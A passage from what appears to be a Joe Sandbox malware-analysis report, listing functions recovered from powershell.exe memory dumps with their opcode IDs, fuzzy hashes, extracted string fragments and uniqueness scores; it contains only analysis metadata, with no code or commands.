                                                • Instruction Fuzzy Hash: 0E519D70A002049FCB14DF68D884AAEBBF6FF89315F108879E445EB750DB75AC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C87C8 Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ef58e173957839a31ca5c7d8168dac8a6b37370e6110823b20974c9daccca19
                                                • Instruction ID: 0c0cf5948029e049ee526e4a94c906a7e89950b7c32c572d953711e350130046
                                                • Opcode Fuzzy Hash: 1ef58e173957839a31ca5c7d8168dac8a6b37370e6110823b20974c9daccca19
                                                • Instruction Fuzzy Hash: F6614134A002498FDB14DFA4C544AADBBB2FF85301F258568E402AF765D778ED89CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07842BDD Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f827656eeb2451e49f7ab0954ab80b1ef31e44a925d8567d945ce8b9799149d6
                                                • Instruction ID: e28c4f92f6d877b91a11637c4afaf3348a403869525632946d62d179709dc2d0
                                                • Opcode Fuzzy Hash: f827656eeb2451e49f7ab0954ab80b1ef31e44a925d8567d945ce8b9799149d6
                                                • Instruction Fuzzy Hash: E141E8F260820ECFCF358F2485417697BA2BFA1364F1440A6E900DF266D775D941CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8C42 Relevance: .1, Instructions: 113COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc8f0973d40bb5ed3d7dd1a87c295f731d88a592453127d867a8e0298f6f89c5
                                                • Instruction ID: 3bd8502dacc07aed461250ebdc45a864f5edab3cb46a3b139207d7c0de21a973
                                                • Opcode Fuzzy Hash: dc8f0973d40bb5ed3d7dd1a87c295f731d88a592453127d867a8e0298f6f89c5
                                                • Instruction Fuzzy Hash: 8A416C70A006099FDB14DFA9C4846ADBBF6FF85341F14883DD446AB794DB74AC85CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CB30A Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bce82ee20559377a7786e5e9a13a7f666cdfb2e6119b633ff1a4992d0ed4340d
                                                • Instruction ID: 9e1868b7d1bee043e3964abd1926ca6541dbf815bce756de7420d681e64918c9
                                                • Opcode Fuzzy Hash: bce82ee20559377a7786e5e9a13a7f666cdfb2e6119b633ff1a4992d0ed4340d
                                                • Instruction Fuzzy Hash: 3F414A35B002108FDB14DF64D595AAE7BB6EF89754F18486CE406EB3A0DB38AC41DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C387B Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22cb0831c79b1a032eb7a4bf9eb7454a63995526efcac0ead402a0113bff5f58
                                                • Instruction ID: fa87f1accf96ebd8dbbc34566a974624043bb72b3fac24aff50eafbf30086722
                                                • Opcode Fuzzy Hash: 22cb0831c79b1a032eb7a4bf9eb7454a63995526efcac0ead402a0113bff5f58
                                                • Instruction Fuzzy Hash: E741D874A01109EFDB15CBA8D594A9DFBF2AF88304F24C559E804AB361C775ED82CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8DFF Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7e94dcef8852e65e15feb19680e11b7268f8c9ac7e2a92ea658702c6a95d796
                                                • Instruction ID: 7ebd483d00177727105ced284c3eae899ba4b26f1f58112300bc367858248c85
                                                • Opcode Fuzzy Hash: e7e94dcef8852e65e15feb19680e11b7268f8c9ac7e2a92ea658702c6a95d796
                                                • Instruction Fuzzy Hash: 63318130B01218DFDF15EFA4D580AADB7F7AF88305F148469E401AB350DB30AD49CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CC038 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7fd496d9102f54865edf2608f0400536e8e531464f0aaeea3afc40d94c3cd04c
                                                • Instruction ID: c5a17c3837670ef3ec2972546932fe1743799f19b8c12901a3f6ffa4b5adecbc
                                                • Opcode Fuzzy Hash: 7fd496d9102f54865edf2608f0400536e8e531464f0aaeea3afc40d94c3cd04c
                                                • Instruction Fuzzy Hash: 74311974A005059FCB14CF9DC9809AEFBB1FF89310B2586A9D949AB751C731EC81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8B18 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6b2b185dd58c30d1db640c69b6663610f81bc65e04801ca858e3659b056f82a
                                                • Instruction ID: 5ca5023d023aed8f9c959bdd9b33d58be9887fd1585f2a85db8c06792c0ddd1e
                                                • Opcode Fuzzy Hash: e6b2b185dd58c30d1db640c69b6663610f81bc65e04801ca858e3659b056f82a
                                                • Instruction Fuzzy Hash: 433178387002049FCB04EF29C448AAEBBF6EF89311F144468E506EB7A1DB75AC81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C31C8 Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee82f44492767dcfe7afb3957177a6f4773619172d77de4ad19cdfa3c3e843e4
                                                • Instruction ID: 0c2ca4747ba6182bf734135fe58d7179cb97f0d564835b1e0ed8acf636078d4d
                                                • Opcode Fuzzy Hash: ee82f44492767dcfe7afb3957177a6f4773619172d77de4ad19cdfa3c3e843e4
                                                • Instruction Fuzzy Hash: FA214CB4A042099FCB00CF98C4809AABBF5FF89310B14859AD919EB352C735FD45CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C31B9 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73ae8f54542bd951234bdd97f5f713ed2449af0b3411a0afe1eb4c591f57c9c2
                                                • Instruction ID: 5ce5dd3497a462e1297cd3aac46ba3e41577b26c0d317b8f1ef6a61b61fc3a1c
                                                • Opcode Fuzzy Hash: 73ae8f54542bd951234bdd97f5f713ed2449af0b3411a0afe1eb4c591f57c9c2
                                                • Instruction Fuzzy Hash: 90213B74A042499FCB11CF98D8909AEBBF5FF49310B1585AAD949EB352C731FC41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CAAD2 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5543a2405c205aa820ced2a4030c8f59c472280272cf8f9906ed8158a5e2cec
                                                • Instruction ID: 98b472358b066480aa91d9c5259e2e9fd9dad90d01486628bc6171b692118083
                                                • Opcode Fuzzy Hash: f5543a2405c205aa820ced2a4030c8f59c472280272cf8f9906ed8158a5e2cec
                                                • Instruction Fuzzy Hash: 9901D4356053948FC721CF65D818B66BBFADF86214F0884BED498CB652C638E885CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C3954 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0563e53f161fc4324a3cc68a165110544fa42f32021e6b3655299c5ff3e339d
                                                • Instruction ID: 8e31d97085fe9a608e77ee31738b4b32c9752ac4666ec5daa50d293895023545
                                                • Opcode Fuzzy Hash: d0563e53f161fc4324a3cc68a165110544fa42f32021e6b3655299c5ff3e339d
                                                • Instruction Fuzzy Hash: 15110A74A05109DFDB55CBA8D484A9DFBF2AF88304F24C559E804AB361C775ED86CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C850A Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 56243eb70fd6992a92f55bc258996d80cb2673a6eb95a0550cfaa62eafa45ea5
                                                • Instruction ID: d9a0ae74dfe5a3811605a448b512e4c94e17ed34d9fc3b39120d3e33be4f01b4
                                                • Opcode Fuzzy Hash: 56243eb70fd6992a92f55bc258996d80cb2673a6eb95a0550cfaa62eafa45ea5
                                                • Instruction Fuzzy Hash: EF014CB4E0424ACFCB40DFA8C4859ADBFF1BF49210F5044AAD505DB322D630A981CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C86D0 Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52e32fb1c19a0588f3d30107a80f039e0e920ef23eb285226b2582c6e0ee4e25
                                                • Instruction ID: a834041de3e2a192bd4655c680c64524da731f10d8cf70cb17ee0f65e30fdbdf
                                                • Opcode Fuzzy Hash: 52e32fb1c19a0588f3d30107a80f039e0e920ef23eb285226b2582c6e0ee4e25
                                                • Instruction Fuzzy Hash: 38F078342043408FC721DB25C440A51BFA8AFC2355B1640FED0488F223C334EC46C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07846364 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2c92dd9b93dfd8647582df774291cbb74ebfef98bfc72b7d8f109b2468a31f4
                                                • Instruction ID: a437f6807acc443e62ff86073a9989e78a1efc8e99c0637bfce4819374d848d6
                                                • Opcode Fuzzy Hash: e2c92dd9b93dfd8647582df774291cbb74ebfef98bfc72b7d8f109b2468a31f4
                                                • Instruction Fuzzy Hash: 9B01F4A160D3C64FCB17D7788855596BF70AF9712071CC4DFE0848F0A3DA25A955CB63
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8710 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de41207b531c6c871d0a3feaba2d1fb4f040ec69af4877f63297cc796680066d
                                                • Instruction ID: 633cffd11bf0d580cd90c479de07f0d2d5c917cc2495563101bcc7b80b1a8e73
                                                • Opcode Fuzzy Hash: de41207b531c6c871d0a3feaba2d1fb4f040ec69af4877f63297cc796680066d
                                                • Instruction Fuzzy Hash: FBF0E2352013508FC725DB19D814B92BBF8EFC6255B1A80FED4488B662D775EC4ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C2D5E Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e3d8b93a362a7b318c4c0fd13a8bb1acd3a74ba2a0bac9a63a59c44f7b32e94
                                                • Instruction ID: 31a9700cd618354858fdbf256b66070211e739d5871e3c9ab58115179ea217cb
                                                • Opcode Fuzzy Hash: 6e3d8b93a362a7b318c4c0fd13a8bb1acd3a74ba2a0bac9a63a59c44f7b32e94
                                                • Instruction Fuzzy Hash: CBF0DA35A001059FCB15CF9CD890AEEF7B5FF88324F248199E515A72A1C736EC52CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CA758 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afdf04e3e486998bb8f60cbc686944e01e0fa3e18141d4ca3428b800755c21ba
                                                • Instruction ID: 6fcfc5b316d9e208e0214f24190c87f48efc51f447a61b988956c0eead9b2200
                                                • Opcode Fuzzy Hash: afdf04e3e486998bb8f60cbc686944e01e0fa3e18141d4ca3428b800755c21ba
                                                • Instruction Fuzzy Hash: 4EE0D8713007016BD300E768E980AEE7BA3EFC5350B148566F512CB755CFB4AC8687D1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8518 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80534f19a880aa3906bc3d184c624e1a0e149ea4b77ef3a12b5a49a2466be327
                                                • Instruction ID: b768a96ebe2f4df759b90b3cc3610af236e4deefc8ed755a4a9c0b0d68267590
                                                • Opcode Fuzzy Hash: 80534f19a880aa3906bc3d184c624e1a0e149ea4b77ef3a12b5a49a2466be327
                                                • Instruction Fuzzy Hash: B6F074B4E0020A8FC780DF68C485A9EBFF1BF49300F6045A9E505EB322E770AA45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 049C8590 Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2d5b0e75c56a9516cc9c201233c1f2c7f9a79e21ddb00709a5897aec96274f7
                                                • Instruction ID: cb720f8300399bb63e1a3ece44c607b70207274ab231e5fafcbdf5a249ac5bfa
                                                • Opcode Fuzzy Hash: b2d5b0e75c56a9516cc9c201233c1f2c7f9a79e21ddb00709a5897aec96274f7
                                                • Instruction Fuzzy Hash: 063191747046458FCB55DB39C8808AEBBF6FF8660035445AAE442CB771DB70ED18CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07845300 Relevance: 12.9, Strings: 10, Instructions: 399COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3550717347
                                                • Opcode ID: bef5bd1e915b97417a8c7c7ab2044034c9edecbcc84f502ee964760f8e624503
                                                • Instruction ID: 2ea607e3f410cc634ccb0a71428de186597e7bc199f4f0fde4f4f12baf950818
                                                • Opcode Fuzzy Hash: bef5bd1e915b97417a8c7c7ab2044034c9edecbcc84f502ee964760f8e624503
                                                • Instruction Fuzzy Hash: ACC149F171020EDFCB258E79C80127EBBA2AFD6215F25807AE405CB251DBB5DD61CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07842838 Relevance: 12.8, Strings: 10, Instructions: 335COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq$ml$ml
                                                • API String ID: 0-3910112021
                                                • Opcode ID: fb3ebf8b33c594d5692f752df777aebcd5508ff7c5ecccf20fd26242b3537a7f
                                                • Instruction ID: a92f49ab3ea5022442bb0752de8c8ecd41b7de9310341cbd7b8c0f410126a260
                                                • Opcode Fuzzy Hash: fb3ebf8b33c594d5692f752df777aebcd5508ff7c5ecccf20fd26242b3537a7f
                                                • Instruction Fuzzy Hash: 37B14DB271830E8FDB259E798801766BFA6BFD5320F1484ABE545CB291DAB1CC41C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07844D30 Relevance: 12.8, Strings: 10, Instructions: 303COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3490351150
                                                • Opcode ID: 7e65df23059b4ec837c4a9f4db882aa197dcbc701286d88c17c1c7c71926d31d
                                                • Instruction ID: ae0dde4d909347faf78977cb9d213888db8468529beacb932818f6e59178f7c5
                                                • Opcode Fuzzy Hash: 7e65df23059b4ec837c4a9f4db882aa197dcbc701286d88c17c1c7c71926d31d
                                                • Instruction Fuzzy Hash: D3A108B1B0015E9BCB249F68C8047AEBBA2EBD5324F24846AD419CB285DB72DD51CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784C9C0 Relevance: 11.4, Strings: 9, Instructions: 196COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$84ul$84ul$tPcq$tPcq$$cq$(iq$(iq$(iq
                                                • API String ID: 0-3685918751
                                                • Opcode ID: 9a4637bc04753fdedde4418975368f57c3ea2ad3d08907d603e004b096bb970d
                                                • Instruction ID: 39a12adf1705f0fbd2bf06d32113c5964ffc8735ed633b22d430c3d0d4a758ac
                                                • Opcode Fuzzy Hash: 9a4637bc04753fdedde4418975368f57c3ea2ad3d08907d603e004b096bb970d
                                                • Instruction Fuzzy Hash: 3F61B5F160220DDFCB24CF55C544B6ABBFAAB95314F198469E805EB290C7B1DD84CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784DBFE Relevance: 10.3, Strings: 8, Instructions: 292COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$x.hk$-hk
                                                • API String ID: 0-1331884746
                                                • Opcode ID: 9fe4ab7509edce6fbe9b7380557e77c12fe2fc08c8f52d5944b3722c6c207574
                                                • Instruction ID: b37507a9b38eb1e8e55d70aa330e8ae593d3272037ee099c9fd45ab9e22c45c3
                                                • Opcode Fuzzy Hash: 9fe4ab7509edce6fbe9b7380557e77c12fe2fc08c8f52d5944b3722c6c207574
                                                • Instruction Fuzzy Hash: 23D11DB4A00219DFDB64DF64C955BEABBB2BB84304F1081E5D6099B345CB719EC1CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784D465 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84ul$84ul$XRhq$XRhq$XRhq$tPcq$tPcq$$cq
                                                • API String ID: 0-2527825340
                                                • Opcode ID: d7a1b260b6d039a158958eb86dfc2f5c460404a3c9f7a8331490dfdc5607f90f
                                                • Instruction ID: 4e5157ac03031b8c8b3556e51e1fdfae976f2f8d68c0a11e1dd4263dc1dbf1b5
                                                • Opcode Fuzzy Hash: d7a1b260b6d039a158958eb86dfc2f5c460404a3c9f7a8331490dfdc5607f90f
                                                • Instruction Fuzzy Hash: A36136B0B0010E9FCB149F68840066ABBE2AF99314F25C4A9EA15DF391CFB1DD41CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784C65C Relevance: 10.2, Strings: 8, Instructions: 157COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$84ul$TQhq$TQhq$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-3264984794
                                                • Opcode ID: 29f51bc65de095738f00e69b21a9a613f2013c7e02e99a9f719af2fa22439701
                                                • Instruction ID: b9ac77d0e58dbbb198bb14066fd2cca8d744a7d3856f908fefd8adb169d67e58
                                                • Opcode Fuzzy Hash: 29f51bc65de095738f00e69b21a9a613f2013c7e02e99a9f719af2fa22439701
                                                • Instruction Fuzzy Hash: 0151F9F060220EEFCB24CE58C5447B677AABF65315F54806AE805DB291D7B5DC80CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784C670 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$84ul$TQhq$TQhq$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-3264984794
                                                • Opcode ID: 2733fa37941bb96232a4fedb7e2df18614bce5fe08cdbc96c924ccabceb349ab
                                                • Instruction ID: 98038b9859ce36f0f9012c4de4b7c1cf819e83e51590cb4bf8f097abf98aa274
                                                • Opcode Fuzzy Hash: 2733fa37941bb96232a4fedb7e2df18614bce5fe08cdbc96c924ccabceb349ab
                                                • Instruction Fuzzy Hash: 3051D7F060220EEFDB24CE59C54476677AABF65315F54C06AE805DB290D7B5DC80CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784D064 Relevance: 7.7, Strings: 6, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$84ul$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-3820076646
                                                • Opcode ID: 047e7eca92e31b0fea6b8ed99476a4138e867bd2476c622b1002e4223f06e828
                                                • Instruction ID: df89b714df7c9b9b838d364a192371854889e9b4dc99c9503a8e187fb94fa79d
                                                • Opcode Fuzzy Hash: 047e7eca92e31b0fea6b8ed99476a4138e867bd2476c622b1002e4223f06e828
                                                • Instruction Fuzzy Hash: EA61BFF070020EDFDB248E54C5447AAB7B2ABA6315F14806AEE01DB295D7B1EC81CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784D078 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$84ul$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-3820076646
                                                • Opcode ID: 56e02ba1873a5de47ea68aa848a96034af5c521f6aafae8389bae03d015eb7ef
                                                • Instruction ID: 635fddae83ce7760b89435af2228bec37acb84cc5370b9c269d1b2209e50afac
                                                • Opcode Fuzzy Hash: 56e02ba1873a5de47ea68aa848a96034af5c521f6aafae8389bae03d015eb7ef
                                                • Instruction Fuzzy Hash: 4761ADF070021EDFDB248E54C544BAAB7B2ABA5315F14806AEE01DB295D7F1ED80CBB1
                                                Uniqueness

